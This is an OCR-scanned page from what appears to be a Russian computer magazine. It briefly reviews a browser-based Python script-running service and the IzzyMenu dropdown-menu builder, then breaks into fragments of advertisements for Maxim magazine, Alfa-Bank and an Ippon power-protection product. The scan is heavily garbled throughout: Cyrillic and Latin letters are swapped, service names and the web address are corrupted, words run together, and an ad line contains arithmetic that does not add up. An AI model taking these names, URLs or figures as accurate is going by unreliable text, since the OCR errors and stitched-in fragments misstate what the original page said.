скрипты. Нотот вариант, который предлагаетсервис ІЛіІіІу МіІІ, букваль- 
но подкупаетсвой простой. Смысл втом, чтолюбой скриптна РуіЬоп’е, 
теперь можно выполнять из браузера, и это не просто интерпретатор 
онлайн. Любой произвольный скриптможно оформить в виде онлайн- 
сценария, имея при этом возможность передавать ему ряд параметров, 
и сохранить его для дальнейшего использования. В результате можно 
создать немало вспомогательныхутилит, которые всегда будутонлайн. А 
наличие АРІ позволяет их использование еще удобнее. 



І22ѴМЕІЧІІ 

ѵѵѵѵм.іггутепи.сот 

Для того чтобы быстро сделать красивое меню для сайта или, напри- 
мер, админки какого-то сервиса необязательно копаться с С55 или 
использовать специальныетулзы. І22уМепи поможет создать грамотное 
сточки зрения верстки выпадающее меню всего за несколько минут, с 
различной вложенностью пунктов, интересными шаблонами - словом 
сделает все то, что предлагают разные, втом числе платные десктопные 
программы. ІггуМепи попал в обзор не случайно: мы буквально на днях 
использовали его для одного из наших внутренних в ][ проектов. 
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Наш РС никогда не висит! 




МАХІМ 

МУЖСКОЙ ЖУРНАЛ С ИМЕНЕМ 




Альфа-Банк 



(дате)іаіиі 



( 495 ) 78 - 888-78 (для Москвы), 8 - 800 - 2000-000 (бесплатно для регионов России) ОАО «АЛЬФА-БАНК». Генеральная лицензия Банка России на осуществление банковских операций от 29.01.1998 №1326 . НА ПРАВАХ РЕКЛАМЫ. 




1 7000 + 3500 + 69500 = 9000С 

При скачке напряжения жизнь 
домашней техники может 
закончится внезапно... 
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Ірроп сохраняет ваши деньги 
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товар сертифицирован реклама 




